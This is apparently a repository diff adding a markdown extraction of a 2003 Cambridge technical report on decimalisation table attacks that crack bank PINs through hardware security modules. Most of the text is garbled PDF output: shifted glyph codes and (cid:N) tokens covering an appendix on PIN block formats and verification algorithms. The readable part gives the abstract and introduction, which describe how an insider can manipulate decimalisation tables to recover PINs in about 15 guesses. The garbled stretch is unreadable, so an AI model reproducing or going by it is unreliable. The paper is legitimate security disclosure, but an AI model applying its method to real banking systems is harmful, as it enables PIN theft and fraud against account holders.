(cid:3)(cid:22)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:20)(cid:20)(cid:19)(cid:19)(cid:19)(cid:20) +2))6(7(cid:22)(cid:15)(cid:20) (cid:3)(cid:23)(cid:22)(cid:21)(cid:23) +3,1BYHULILFDWLRQ(cid:3)FDOO(cid:3)UHWXUQHG(cid:3))$/6( +(cid:17)(cid:17)(cid:17) +M(cid:3) (cid:3)(cid:20)(cid:21)(cid:22)(cid:23) +9$/B’$7$(cid:22)(cid:15)(cid:20) (cid:3)(cid:22)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:20)(cid:20)(cid:21)(cid:22)(cid:23) +2))6(7(cid:22)(cid:15)(cid:20) (cid:3)(cid:24)(cid:24)(cid:24)(cid:26) +3,1(cid:3)YHULILFDWLRQ(cid:3)FDOO(cid:3)UHWXUQHG(cid:3)758((cid:17)(cid:3)(cid:3)6WRUH(cid:3)M(cid:3) (cid:3)(cid:20)(cid:21)(cid:22)(cid:23)(cid:3)DV(cid:3)FDQGLGDWH(cid:3)IRU(cid:3)WKH(cid:3)3,1(cid:17) +(cid:17)(cid:17)(cid:17) +&KDQJLQJ(cid:3)WKH(cid:3)GHFLPDOL]DWLRQ(cid:3)WDEOH(cid:3)DQG(cid:3)FDOOLQJ(cid:3)WKH(cid:3)RIIVHW(cid:3)YHULI\(cid:3)IXQFWLRQ(cid:3)DJDLQ(cid:3)FDQ(cid:3)HOLPLQDWH(cid:3)VRPH(cid:3)IDOVH(cid:3) +ZLWQHVVHV(cid:3)(cid:11)WKH(cid:3)GLJLWV(cid:3)(cid:19)(cid:3)WR(cid:3)(cid:28)(cid:3)PXVW(cid:3)UHPDLQ(cid:3)PDSSHG(cid:3)WR(cid:3)WKHPVHOYHV(cid:12)(cid:17)(cid:3)(cid:3)((cid:17)J(cid:17)(cid:3)^Q(cid:3)o Q(cid:3)(cid:11)Q(cid:3)(cid:31)(cid:3)(cid:20)(cid:19)(cid:12)(cid:15)(cid:3)HOVH(cid:3)Q(cid:3)o Q(cid:14)(cid:20)(cid:3)PRG(cid:3) +(cid:20)(cid:19)(cid:3)(cid:11)Q(cid:3)t (cid:20)(cid:19)(cid:12)(cid:17) +(cid:28)(cid:17) 5HIHUHQFHV +(cid:20)(cid:17) 5(cid:17)-(cid:17)(cid:3)$QGHUVRQ(cid:15)(cid:3)(cid:5)6HFXULW\(cid:3)(QJLQHHULQJ(cid:3)(cid:16) $(cid:3)*XLGH(cid:3)WR(cid:3)%XLOGLQJ(cid:3)’HSHQGDEOH(cid:3)’LVWULEXWHG(cid:3)6\VWHPV(cid:5)(cid:15)(cid:3) +:LOH\(cid:15)(cid:3)(cid:21)(cid:19)(cid:19)(cid:20) +(cid:21)(cid:17) 5(cid:17)-(cid:17)(cid:3) $QGHUVRQ(cid:15)(cid:3) (cid:5)7KH(cid:3) &RUUHFWQHVV(cid:3) RI(cid:3) &U\SWR(cid:3) 7UDQVDFWLRQ(cid:3) 6HWV(cid:5)(cid:15)(cid:3) 6HFXULW\(cid:3) 3URWRFROV(cid:3) † (cid:27)WK(cid:3) +,QWHUQDWLRQDO(cid:3):RUNVKRS(cid:15)(cid:3)6SULQJHU(cid:16)9HUODJ(cid:15)(cid:3)(cid:21)(cid:19)(cid:19)(cid:19) +(cid:22)(cid:17) 5(cid:17)-(cid:17)(cid:3) $QGHUVRQ(cid:3) DQG(cid:3) 0(cid:17)(cid:3) %RQG(cid:15)(cid:3) (cid:5)$3,(cid:16)/HYHO(cid:3) $WWDFNV(cid:3) RQ(cid:3) (PEHGGHG(cid:3) 6\VWHPV(cid:5)(cid:15)(cid:3) ,((((cid:3) &RPSXWHU(cid:3) +0DJD]LQH(cid:3)2FWREHU(cid:3)(cid:21)(cid:19)(cid:19)(cid:20)(cid:15)(cid:3)(cid:21)(cid:19)(cid:19)(cid:20)(cid:15)(cid:3)SS(cid:3)(cid:25)(cid:26)(cid:16)(cid:26)(cid:24) +(cid:23)(cid:17) 0(cid:17)(cid:3)%RQG(cid:15) (cid:5)$WWDFNV(cid:3) RQ(cid:3) &U\SWRSURFHVVRU(cid:3) 7UDQVDFWLRQV(cid:3) 6HWV(cid:5)(cid:15)(cid:3) &U\SWRJUDSKLF(cid:3) +DUGZDUH(cid:3) DQG(cid:3) +(PEHGGHG(cid:3)6\VWHPV(cid:3)&+(6(cid:3)(cid:21)(cid:19)(cid:19)(cid:20)(cid:3)7KLUG(cid:3),QWHUQDWLRQDO(cid:3):RUNVKRS(cid:15)(cid:3)6SULQJHU(cid:16)9HUODJ(cid:3)(cid:15)(cid:3)(cid:21)(cid:19)(cid:19)(cid:20)(cid:15)(cid:3)SS(cid:3)(cid:21)(cid:21)(cid:19)(cid:16) +(cid:21)(cid:22)(cid:23) +(cid:24)(cid:17) &&$(cid:3)$3,(cid:3)5HOHDVH(cid:3)(cid:21)(cid:17)(cid:23)(cid:20)(cid:3)DYDLODEOH(cid:3)DW(cid:3)(cid:3)KWWS(cid:29)(cid:18)(cid:18)ZZZ(cid:16) +(cid:22)(cid:17)LEP(cid:17)FRP(cid:18)VHFXULW\(cid:18)FU\SWRFDUGV(cid:18)KWPO(cid:18)UHOHDVH(cid:21)(cid:23)(cid:20)(cid:17)VKWPO +(cid:20)(cid:25) + +3,1(cid:3)5HFRYHU\(cid:3)$WWDFNV +(cid:20)(cid:19)(cid:17) $SSHQGL[ +$(cid:3)6WDQGDUG(cid:3))LQDQFLDO(cid:3)3,1(cid:3)7UDQVDFWLRQ(cid:3)6HW +(cid:20)(cid:19)(cid:17)(cid:20)(cid:17) 3,1(cid:3)%ORFN(cid:3))RUPDWV +:H(cid:3)EULHIO\(cid:3)GHVFULEH(cid:3)D(cid:3)VXEVHW(cid:3)RI(cid:3)WKH(cid:3)FRPPRQ(cid:3)3,1(cid:3)EORFN(cid:3)IRUPDWV(cid:3)WKDW(cid:3)DUH(cid:3)XVHG(cid:3)ODWHU(cid:17)(cid:3)7KH(cid:3)QRWDWLRQ(cid:3)DQG(cid:3) +GHVFULSWLRQV(cid:3)DUH(cid:3)UHSURGXFHG(cid:3)IURP(cid:3)>(cid:24)@(cid:3)DQG(cid:3)LQFOXGHG(cid:3)KHUH(cid:3)IRU(cid:3)FRPSOHWHQHVV(cid:17) +3,1(cid:3)1RWDWLRQ +3(cid:3) (cid:3)$(cid:3)(cid:23)(cid:16)ELW(cid:3)GHFLPDO(cid:3)GLJLW(cid:3)WKDW(cid:3)LV(cid:3)RQH(cid:3)GLJLW(cid:3)RI(cid:3)WKH(cid:3)3,1(cid:3)YDOXH(cid:17) +&(cid:3) (cid:3)$(cid:3)(cid:23)(cid:16)ELW(cid:3)FRQWURO(cid:3)YDOXH(cid:17)(cid:3)7KH(cid:3)YDOLG(cid:3)YDOXHV(cid:3)DUH(cid:3);(cid:10)(cid:19)(cid:10)(cid:3)DQG(cid:3);(cid:10)(cid:20)(cid:10)(cid:17) +/(cid:3) (cid:3)$(cid:3)(cid:23)(cid:16)ELW(cid:3)KH[DGHFLPDO(cid:3)GLJLW(cid:3)WKDW(cid:3)VSHFLILHV(cid:3)WKH(cid:3)QXPEHU(cid:3)RI(cid:3)3,1(cid:3)GLJLWV(cid:17) +)(cid:3) (cid:3)$(cid:3)(cid:23)(cid:16)ELW(cid:3)ILHOG(cid:3)GHOLPLWHU(cid:3)RI(cid:3)YDOXH(cid:3);(cid:10))(cid:10)(cid:17) +I(cid:3) (cid:3)$(cid:3)(cid:23)(cid:16)ELW(cid:3)GHOLPLWHU(cid:3)ILOOHU(cid:3)WKDW(cid:3)LV(cid:3)HLWKHU(cid:3)3(cid:3)RU(cid:3))(cid:15)(cid:3)GHSHQGLQJ(cid:3)RQ(cid:3)WKH(cid:3) +OHQJWK(cid:3)RI(cid:3)WKH(cid:3)3,1(cid:17) +’(cid:3) (cid:3)$(cid:3)(cid:23)(cid:16)ELW(cid:3)GHFLPDO(cid:3)SDGGLQJ(cid:3)YDOXH(cid:17)(cid:3)$OO(cid:3)SDG(cid:3)GLJLWV(cid:3)LQ(cid:3)WKH(cid:3)3,1(cid:3)EORFN +KDYH(cid:3)WKH(cid:3)VDPH(cid:3)YDOXH(cid:17) +;(cid:3) (cid:3)$(cid:3)(cid:23)(cid:16)ELW(cid:3)KH[DGHFLPDO(cid:3)SDGGLQJ(cid:3)YDOXH(cid:17)(cid:3)$OO(cid:3)SDG(cid:3)GLJLWV(cid:3)LQ(cid:3)WKH(cid:3)3,1(cid:3)EORFN +KDYH(cid:3)WKH(cid:3)VDPH(cid:3)YDOXH(cid:17) +[(cid:3) (cid:3)$(cid:3)(cid:23)(cid:16)ELW(cid:3)KH[DGHFLPDO(cid:3)ILOOHU(cid:3)WKDW(cid:3)LV(cid:3)HLWKHU(cid:3)3(cid:3)RU(cid:3);(cid:15)(cid:3)GHSHQGLQJ(cid:3)RQ(cid:3)WKH(cid:3) +OHQJWK(cid:3)RI(cid:3)WKH(cid:3)3,1(cid:17) +5(cid:3) (cid:3)$(cid:3)(cid:23)(cid:16)ELW(cid:3)KH[DGHFLPDO(cid:3)UDQGRP(cid:3)GLJLW(cid:17)(cid:3)7KH(cid:3)VHTXHQFH(cid:3)RI(cid:3)5(cid:3)GLJLWV(cid:3)FDQ(cid:3)HDFK(cid:3) +WDNH(cid:3)D(cid:3)GLIIHUHQW(cid:3)YDOXH(cid:17) +U(cid:3) (cid:3)$(cid:3)(cid:23)(cid:16)ELW(cid:3)UDQGRP(cid:3)ILOOHU(cid:3)WKDW LV(cid:3)HLWKHU(cid:3)3(cid:3)RU(cid:3)5(cid:15)(cid:3)GHSHQGLQJ(cid:3)RQ(cid:3)WKH(cid:3) +OHQJWK(cid:3)RI(cid:3)WKH(cid:3)3,1(cid:17) +=(cid:3) (cid:3)$(cid:3)(cid:23)(cid:16)ELW(cid:3)KH[DGHFLPDO(cid:3)]HUR(cid:3)(cid:11);(cid:10)(cid:19)(cid:10)(cid:12)(cid:17) +](cid:3) (cid:3)$(cid:3)(cid:23)(cid:16)ELW(cid:3)]HUR(cid:3)ILOOHU(cid:3)WKDW(cid:3)LV(cid:3)HLWKHU(cid:3)3(cid:3)RU(cid:3)=(cid:15)(cid:3)GHSHQGLQJ(cid:3)RQ(cid:3)WKH(cid:3) +OHQJWK(cid:3)RI(cid:3)WKH(cid:3)3,1(cid:17) +6(cid:3) (cid:3)$(cid:3)(cid:23)(cid:16)ELW(cid:3)KH[DGHFLPDO(cid:3)GLJLW(cid:3)WKDW(cid:3)FRQVWLWXWHV(cid:3)RQH(cid:3)GLJLW(cid:3)RI(cid:3)D(cid:3)VHTXHQFH +QXPEHU(cid:17) +$(cid:3) (cid:3)$(cid:3)(cid:23)(cid:16)ELW(cid:3)GHFLPDO(cid:3)GLJLW(cid:3)WKDW(cid:3)FRQVWLWXWHV(cid:3)RQH(cid:3)GLJLW(cid:3)RI(cid:3)D(cid:3)XVHU(cid:16)VSHFLILHG +FRQVWDQW(cid:17) +$16,(cid:3);(cid:28)(cid:17)(cid:27) +(cid:11),62(cid:3)IRUPDW(cid:3)(cid:19)(cid:15)(cid:3)9,6$(cid:3)(cid:3)IRUPDW(cid:3)(cid:20)(cid:15)(cid:3)9,6$(cid:3)IRUPDW(cid:3)(cid:23)(cid:15)(cid:3)(&,(cid:3)IRUPDW(cid:3)(cid:20)(cid:12) +3(cid:20)(cid:3) (cid:3)&/3333IIIIIIIII)) +3(cid:21)(cid:3) (cid:3)====$$$$$$$$$$$$$ +3,1(cid:3)%ORFN(cid:3)(cid:11)3%(cid:12)(cid:3) (cid:3)3(cid:20)(cid:3);25(cid:3)3(cid:21) +ZKHUH(cid:3)&(cid:3) (cid:3);(cid:10)(cid:19)(cid:10)(cid:3)DQG(cid:3)/(cid:3) (cid:3);(cid:10)(cid:23)(cid:10)(cid:3)WR(cid:3);(cid:10)&(cid:10) +,62(cid:3))RUPDW(cid:3)(cid:20) (cid:11)(&,(cid:3)IRUPDW(cid:3)(cid:23)(cid:12) +3,1(cid:3)%ORFN(cid:3)(cid:11)3%(cid:12)(cid:3) (cid:3)&/3333UUUUUUUUU55 +ZKHUH(cid:3)&(cid:3) (cid:3);(cid:10)(cid:20)(cid:10)(cid:3)DQG(cid:3)/(cid:3) (cid:3);(cid:10)(cid:23)(cid:10)(cid:3)WR(cid:3);(cid:10)&(cid:10) +9,6$(cid:3))RUPDW(cid:3)(cid:21) +3,1(cid:3)%ORFN(cid:3)(cid:11)3%(cid:12)(cid:3) (cid:3)/3333]]’’’’’’’’’ +ZKHUH(cid:3)/(cid:3) (cid:3);(cid:10)(cid:23)(cid:10)(cid:3)WR(cid:3);(cid:10)(cid:25)(cid:10) +9,6$(cid:3))RUPDW(cid:3)(cid:22) +(cid:20)(cid:26) + +3,1(cid:3)5HFRYHU\(cid:3)$WWDFNV +7KLV(cid:3)IRUPDW(cid:3)VSHFLILHV(cid:3)WKDW(cid:3)WKH(cid:3)3,1(cid:3)OHQJWK FDQ(cid:3)EH(cid:3)(cid:23)(cid:16)(cid:20)(cid:21)(cid:3)GLJLWV(cid:3)LQFOXVLYH(cid:17)(cid:3) +7KH(cid:3)3,1(cid:3)VWDUW(cid:3)IURP(cid:3)WKH(cid:3)OHIW(cid:3)PRVW(cid:3)GLJLW(cid:3)DQG(cid:3)HQGV(cid:3)E\(cid:3)WKH(cid:3)GHOLPHWHU(cid:3)(cid:11)(cid:10))(cid:10)(cid:12)(cid:17) +$Q(cid:3)H[DPSOH(cid:3)RI(cid:3)D(cid:3)(cid:25)(cid:3)GLJLW(cid:3)3,1 +3,1(cid:3)%ORFN(cid:3)(cid:11)3%(cid:12)(cid:3) (cid:3)333333);;;;;;;;; +,%0(cid:3)(cid:22)(cid:25)(cid:21)(cid:20)(cid:3))RUPDW +7KLV(cid:3)IRUPDW(cid:3)UHTXLUHV(cid:3)WKH(cid:3)SURJUDP(cid:3)WR(cid:3)VSHFLI\(cid:3)WKH(cid:3)GHOLPLWHU(cid:15)(cid:3);(cid:15)(cid:3)IRU +GHWHUPLQLQJ(cid:3)WKH(cid:3)3,1(cid:3)OHQJWK(cid:17) +3,1(cid:3)%ORFN(cid:3)(cid:11)3%(cid:12)(cid:3) (cid:3)66663333[[[[[[[[ +(&,(cid:3))RUPDW(cid:3)(cid:21) +7KLV(cid:3)IRUPDW(cid:3)GHILQHV(cid:3)WKH(cid:3)3,1(cid:3)WR(cid:3)EH(cid:3)(cid:23)(cid:3)GLJLWV(cid:17) +3,1(cid:3)%ORFN(cid:3)(cid:11)3%(cid:12)(cid:3) (cid:3)3333555555555555 +(cid:20)(cid:19)(cid:17)(cid:21)(cid:17) )XQFWLRQV +$(cid:3)JLYHQ(cid:3)ILQDQFLDO(cid:3)$3,(cid:3)PD\(cid:3)KDYH(cid:3)PDQ\(cid:3)3,1(cid:3)UHODWHG(cid:3)FRPPDQGV(cid:3)LQ(cid:3)LWV(cid:3)WUDQVDFWLRQ(cid:3)VHW(cid:17)(cid:3)(cid:3)7KHUH(cid:3)DUH(cid:3)KRZHYHU(cid:15)(cid:3) +WKUHH(cid:3)IXQFWLRQV(cid:15)(cid:3)ZKLFK(cid:3)IRUP(cid:3)WKH(cid:3)FRUH(cid:3)D(cid:3)3,1(cid:15)(cid:3)EDVHG(cid:3)V\VWHP(cid:17)(cid:3)(cid:3)7KHVH(cid:3)DUH(cid:29) +x 3,1(cid:3)JHQHUDWLRQ(cid:3)(cid:11)WKH(cid:3)SURFHVV(cid:3)RI(cid:3)JHQHUDWLQJ(cid:3)D(cid:3)3,1(cid:12) +x 3,1(cid:3)YHULILFDWLRQ(cid:3)(cid:11)WKH(cid:3)SURFHVV(cid:3)RI(cid:3)YHULI\LQJ(cid:3)WKDW(cid:3)WKH(cid:3)3,1(cid:3)FRQWDLQHG(cid:3)LQ(cid:3)DQ(cid:3)HQFU\SWHG(cid:3)3,1(cid:3)EORFN(cid:3)LV(cid:3) +WKH(cid:3)(cid:10)FRUUHFW(cid:10)(cid:3)3,1(cid:3)IRU(cid:3)D(cid:3)JLYHQ(cid:3)DFFRXQW(cid:3)KROGHU(cid:12) +x 3,1(cid:3)WUDQVODWLRQ(cid:3)(cid:11)WKH(cid:3)SURFHVV(cid:3)RI(cid:3)WUDQVODWLQJ(cid:3)DQ(cid:3)HQFU\SWHG(cid:3)3,1(cid:3)EORFN(cid:3)EHWZHHQ(cid:3)3,1(cid:3)IRUPDWV(cid:3)DQG(cid:3) +HQFU\SWLQJ(cid:3)NH\V(cid:12) +(cid:20)(cid:19)(cid:17)(cid:22)(cid:17) $OJRULWKPV +3,1(cid:3)JHQHUDWLRQ(cid:3)FDQ(cid:3)EH(cid:3)DFKLHYHG(cid:3)LQ(cid:3)D(cid:3)YDULHW\(cid:3)RI(cid:3)ZD\V(cid:15)(cid:3)HLWKHU(cid:3)E\(cid:3)PHDQV(cid:3)RI(cid:3)DQ(cid:3)DOJRULWKP(cid:3)RU(cid:3)FKRVHQ(cid:3)E\(cid:3)D(cid:3) +XVHU(cid:3)(cid:11)RU(cid:3)ERWK(cid:12)(cid:17)(cid:3)(cid:3)$Q(cid:3)H[DPSOH(cid:3)RI(cid:3)WKH(cid:3)DOJRULWKPLF(cid:3)DSSURDFK(cid:3)LV(cid:3)WKH(cid:3),%0(cid:3)(cid:22)(cid:25)(cid:21)(cid:23)(cid:3)3,1(cid:3)*HQHUDWLRQ(cid:3)$OJRULWKP(cid:15)(cid:3) +ZKLFK(cid:3)JHQHUDWHV(cid:3)D(cid:3)3,1(cid:3)EDVHG(cid:3)RQ(cid:3)DFFRXQW(cid:16) RU(cid:3)SHUVRQ(cid:16)UHODWHG(cid:3)GDWD(cid:15)(cid:3)FDOOHG(cid:3)WKH(cid:3)YDOLGDWLRQ(cid:3)GDWD(cid:17)(cid:3)(cid:3)7KH(cid:3) +YDOLGDWLRQ(cid:3)GDWD(cid:3)LV(cid:3)HQFLSKHUHG(cid:3)XQGHU(cid:3)D(cid:3)3,1(cid:3)JHQHUDWLQJ(cid:3)NH\(cid:15)(cid:3)GHFLPDOLVHG(cid:3)DQG(cid:3)WKH(cid:3)GHVLUHG QXPEHU(cid:3)RI(cid:3)GLJLWV(cid:3) +VHOHFWHG(cid:3)DV(cid:3)WKH(cid:3)3,1(cid:17) +(cid:20)(cid:27) + +3,1(cid:3)5HFRYHU\(cid:3)$WWDFNV +9DOLGDWLRQ(cid:3)’DWD +3,1(cid:3)*HQHUDWLRQ +(’((cid:3)0XOWLSOH(cid:3)(QFU\SWLRQ +.H\ +&LSKHUWH[W +’HFLPDOL]DWLRQ(cid:3)7DEOH ’LJLW(cid:3)5HSODFHPHQW +*HQHUDWHG(cid:3)3,1 +)LJXUH(cid:3)(cid:20)(cid:19)(cid:16)(cid:20)3,1(cid:3)*HQHUDWLRQ(cid:3)$OJRULWKP +9HULILFDWLRQ(cid:3)LV(cid:3)DFKLHYHG(cid:3)E\(cid:3)UHSHDWLQJ(cid:3)WKH(cid:3)SURFHVV(cid:3)(cid:11)H[FHSW(cid:3)WKDW(cid:3)QRZ(cid:3)WKH(cid:3)NH\(cid:3)PD\(cid:3)EH(cid:3)FDOOHG(cid:3)WKH(cid:3)3,1(cid:3) +YHULILFDWLRQ(cid:3)NH\(cid:12)(cid:3)DQG(cid:3)FRPSDULQJ(cid:3)WKH(cid:3)FDOFXODWHG(cid:3)3,1(cid:3)ZLWK(cid:3)WKH(cid:3)3,1(cid:3)WKDW(cid:3)LV(cid:3)H[WUDFWHG(cid:3)IURP(cid:3)WKH(cid:3)HQFU\SWHG(cid:3) +3,1(cid:3)EORFN(cid:17)(cid:3)(cid:3) +*HQHUDWLQJ(cid:3)DOJRULWKPV(cid:3)FDQ(cid:3)EH(cid:3)H[WHQGHG(cid:3)WR(cid:3)FDWHU(cid:3)IRU(cid:3)FKRVHQ(cid:3)3,1V(cid:17)(cid:3)(cid:3)7KLV(cid:3)LV(cid:3)DFKLHYHG(cid:3)WKURXJK(cid:3)WKH(cid:3)XVH(cid:3)RI(cid:3) +RIIVHWV(cid:15)(cid:3) ZKLFK(cid:3) UHODWH(cid:3) WKH(cid:3) DOJRULWKP(cid:3) JHQHUDWHG(cid:3) 3,1(cid:3) WR(cid:3) WKH(cid:3) FKRVHQ(cid:3) 3,1(cid:17)(cid:3) (cid:3) 7KH(cid:3) QRUPDO(cid:3) JHQHUDWLRQ(cid:3) +DOJRULWKP(cid:3)LV(cid:3)UXQ(cid:3)(cid:11)ZLWK(cid:3)WKH(cid:3)VDPH(cid:3)SDUDPHWHUV(cid:12)(cid:3)DQG(cid:3)WKH(cid:3)RXWSXW(cid:3)FDOOHG(cid:3)DQ(cid:3)LQWHUPHGLDWH(cid:3)3,1(cid:17)(cid:3)(cid:3)7KH(cid:3)RIIVHW(cid:3)LV(cid:3) +FDOFXODWHG(cid:3)E\(cid:3)VXEWUDFWLQJ(cid:3)PRGXOR(cid:3)(cid:20)(cid:19)(cid:3)WKH(cid:3)FKRVHQ(cid:3)3,1(cid:3)GLJLWV(cid:3)IURP(cid:3)VRPH(cid:3)VXEVHW(cid:3)RI(cid:3)WKH(cid:3)LQWHUPHGLDWH(cid:3)3,1(cid:3) +GLJLWV(cid:3)(cid:11)XVXDOO\(cid:3)HLWKHU(cid:3)WKH(cid:3)OHIWPRVW(cid:3)RU(cid:3)ULJKWPRVW(cid:3)GLJLWV(cid:12)(cid:17) +(cid:20)(cid:28) + +3,1(cid:3)5HFRYHU\(cid:3)$WWDFNV +9DOLGDWLRQ(cid:3)’DWD +3,1(cid:3)*HQHUDWLRQ +(’((cid:3)0XOWLSOH(cid:3)(QFU\SWLRQ +.H\ +&LSKHUWH[W +’HFLPDOL]DWLRQ(cid:3)7DEOH ’LJLW(cid:3)5HSODFHPHQW +,QWHUPHGLDWH(cid:3)3,1(cid:3)(cid:11),3,1(cid:12) +&XVWRPHU(cid:3)6HOHFWHG(cid:3)3,1 +’LJLW(cid:3)6XEWUDFWLRQ(cid:3)PRGXOR +(cid:20)(cid:19) +2IIVHW +)LJXUH(cid:3)(cid:20)(cid:19)(cid:16)(cid:21)3,1(cid:3)2IIVHW(cid:3)*HQHUDWLRQ(cid:3)$OJRULWKP +9HULILFDWLRQ(cid:3)UHTXLUHV(cid:3)WKDW(cid:3)WKH(cid:3)RIIVHW(cid:3)WR(cid:3)EH(cid:3)VXSSOLHG(cid:3)WR(cid:3)WKH(cid:3)FDOO(cid:3)DV(cid:3)ZHOO(cid:17) +(cid:21)(cid:19) + +3,1(cid:3)5HFRYHU\(cid:3)$WWDFNV +9DOLGDWLRQ(cid:3)’DWD +3,1(cid:3)9HULILFDWLRQ +(’((cid:3)0XOWLSOH(cid:3)(QFU\SWLRQ +.H\ +&LSKHUWH[W +’HFLPDOLVDWLRQ(cid:3)7DEOH ’LJLW(cid:3)5HSODFHPHQW +,QWHUPHGLDWH(cid:3)3,1(cid:3)(cid:11),3,1(cid:12) +2IIVHW +’LJLW(cid:3)$GGLWLRQ(cid:3)PRGXOR(cid:3)(cid:20)(cid:19) +&DOFXODWHG(cid:3)3,1 +)LJXUH(cid:3)(cid:20)(cid:19)(cid:16)(cid:22)3,1(cid:3)9HULILFDWLRQ(cid:3)$OJRULWKP +)RU(cid:3)D(cid:3)FKRVHQ(cid:3)3,1(cid:15)(cid:3)WKH(cid:3)3,1(cid:3)JHQHUDWLRQ(cid:3)DOJRULWKP(cid:3)DFFHSWV(cid:3)D(cid:3)3,1(cid:3)(cid:11)HLWKHU(cid:3)FOHDU(cid:3)RU(cid:3)HQFU\SWHG(cid:12)(cid:3)DV(cid:3)LQSXW(cid:3)DQG(cid:3) +PXVW(cid:3)FDOFXODWH(cid:3)D(cid:3)3,1(cid:3)YHULILFDWLRQ(cid:3)YDOXH(cid:3)(cid:11)399(cid:12)(cid:15)(cid:3)ZKLFK(cid:3)LV(cid:3)VWRUHG +(cid:21)(cid:20) + +3,1(cid:3)5HFRYHU\(cid:3)$WWDFNV +7UDQVIRUPHG(cid:3)6HFXULW\ +3DUDPHWHU(cid:3)(cid:11)763(cid:12) +3,1(cid:3)*HQHUDWLRQ (’((cid:3)0XOWLSOH(cid:3)(QFU\SWLRQ +.H\ +&LSKHUWH[W +’HFLPDOL]DWLRQ(cid:3)$OJRULWKP +3,1(cid:3)9HULILFDWLRQ(cid:3)9DOXH +(cid:11)399(cid:12) +)LJXUH(cid:3)(cid:20)(cid:19)(cid:16)(cid:23)399(cid:3)*HQHUDWLRQ(cid:3)$OJRULWKP +9HULILFDWLRQ(cid:3)LQYROYHV(cid:3)H[WUDFWLQJ(cid:3)WKH(cid:3)3,1(cid:15)(cid:3)FDOFXODWLQJ(cid:3)WKH(cid:3)YHULILFDWLRQ(cid:3)YDOXH(cid:3)DQG(cid:3)FRPSDULQJ(cid:3)LW(cid:3)WR(cid:3)D(cid:3) +VXSSOLHG(cid:3)399(cid:17)(cid:3)(cid:3)$Q(cid:3)H[DPSOH(cid:3)LV(cid:3)WKH(cid:3)9,6$(cid:3)3,1(cid:3)YHULILFDWLRQ(cid:3)DOJRULWKP(cid:17)(cid:3) +)LQDOO\(cid:15)(cid:3)WKH(cid:3)WUDQVODWH(cid:3)3,1(cid:3)IXQFWLRQ(cid:3)H[WUDFWV(cid:3)WKH(cid:3)3,1(cid:3)IURP(cid:3)DQ(cid:3)HQFU\SWHG(cid:3)3,1(cid:3)EORFN(cid:3)DFFRUGLQJ(cid:3)WR(cid:3)WKH(cid:3) +UXOHV(cid:3)RI(cid:3)WKH(cid:3)3,1(cid:3)EORFN(cid:10)V(cid:3)IRUPDW(cid:17)(cid:3)(cid:3)7KH(cid:3)IXQFWLRQ(cid:3)WKHQ(cid:3)UHIRUPDWV(cid:3)LW(cid:3)LQWR(cid:3)WKH(cid:3)UHTXHVWHG(cid:3)WDUJHW(cid:3)IRUPDW(cid:3)DQG(cid:3) +HQFU\SWV(cid:3)XQGHU(cid:3)WKH WDUJHW(cid:3)3,1(cid:3)HQFU\SWLQJ(cid:3)NH\(cid:17) +(cid:21)(cid:21) diff --git a/PIN Cracking - UCAM-CL-TR-560_pdf.md b/PIN Cracking - UCAM-CL-TR-560_pdf.md new file mode 100644 index 0000000..ebfd68d --- /dev/null +++ b/PIN Cracking - UCAM-CL-TR-560_pdf.md @@ -0,0 +1,526 @@ +# PIN Cracking - UCAM-CL-TR-560 + + +--- + +Technical Report +UCAM-CL-TR-560 +ISSN 1476-2986 +Number 560 +Computer Laboratory +Decimalisation table attacks for PIN +cracking +Mike Bond, Piotr Zielin·ski +February 2003 +15 JJ Thomson Avenue +Cambridge CB3 0FD +United Kingdom +phone +44 1223 763500 +http://www.cl.cam.ac.uk/ + +c 2003 Mike Bond, Piotr Zielin·ski +(cid:13) +Technical reports published by the University of Cambridge +Computer Laboratory are freely available via the Internet: +http://www.cl.cam.ac.uk/TechReports/ +Series editor: Markus Kuhn +ISSN 1476-2986 + +Decimalisation table attacks for PIN cracking +Mike Bond, Piotr Zielin(cid:19)ski +Abstract +We present an attack on hardware security modules used by retail banks for the +secure storage and veri(cid:12)cation of customer PINs in ATM (cash machine) infrastruc- +tures. By using adaptive decimalisation tables and guesses, the maximum amount +of information is learnt about the true PIN upon each guess. It takes an average of +15 guesses to determine a four digit PIN using this technique, instead of the 5000 +guesses intended. In a single 30 minute lunch-break, an attacker can thus discover +approximately 7000 PINs rather than 24 with the brute force method. With a $300 +withdrawal limitpercard, thepotentialbountyisraisedfrom$7200to$2.1million +and a single motivated attacker could withdraw $30{50 thousand of this each day. +This attack thus presents a serious threat to bank security. +1 Introduction +Automatic Teller Machines (ATMs) are used by millions of customers every day to make +cash withdrawals from their accounts. However, the wide deployment and sometimes +secludedlocationsofATMsmakethemidealtoolsforcriminalstoturntraceableelectronic +money into clean cash. +The customer PIN is the primary security measure against fraud; forgery of the mag- +netic stripe on cards is trivial in comparison to PIN acquisition. A street criminal can +easily steal a cash card, but unless he observes the customer enter the PIN at an ATM, +he can only have three guesses to match against a possible 10,000 PINs and would rarely +strike it lucky. Even when successful, his theft still cannot exceed the daily withdrawal +limit of around $300 . However, bank programmers have access to the computer systems +tasked with the secure storage of PINs, which normally consist of a mainframe connected +to a \Hardware Security Module" (HSM) which is tamper-resistant and has a restricted +API such that it will only respond to with a YES/NO answer to a customer’s guess. +A crude method of attack is for a corrupt bank programmer to write a program that +tries all PINs for a particular account, and with average luck this would require about +5000 transactions to discover each PIN. A typical HSM can check maybe 60 trial PINs +per second in addition to its normal load, thus a corrupt employee executing the program +during a 30 minute lunch break could only make o(cid:11) with about 25 PINs. +However, HSMs implementing several common PIN generation methods have a (cid:13)aw. +The (cid:12)rst ATMs were IBM 3624s, introduced widely in the US in around 1980, and most +PIN generation methods are based upon their approach. They calculate the customer’s +original PIN by encrypting the account number printed on the front of the customer’s +card with a secret DES key called a \PIN generation key". The resulting ciphertext +3 + +is converted into hexadecimal, and the (cid:12)rst four digits taken. Each digit has a range of +‘0’-‘F’.InordertoconvertthisvalueintoaPINwhichcanbetypedonadecimalkeypad, +a \decimalisation table" is used, which is a many-to-one mapping between hexadecimal +digits and numeric digits. The left decimalisation table in Figure 1 is typical. +0123456789ABCDEF 0123456789ABCDEF +0123456789012345 0000000100000000 +Figure 1: Normal and attack decimalisation tables +This table is not considered a sensitive input by many HSMs, so an arbitrary table +can be provided along with the account number and a trial PIN. But by manipulating +the contents of the table it becomes possible to learn much more about the value of the +PIN than simply excluding a single combination. For example, if the right hand table is +used, a match with a trial pin of 0000 will con(cid:12)rm that the PIN does not contain the +number 7, thus eliminating over 10% of the possible combinations. We (cid:12)rst present a +simple scheme that can derive most PINs in around 24 guesses, and then an 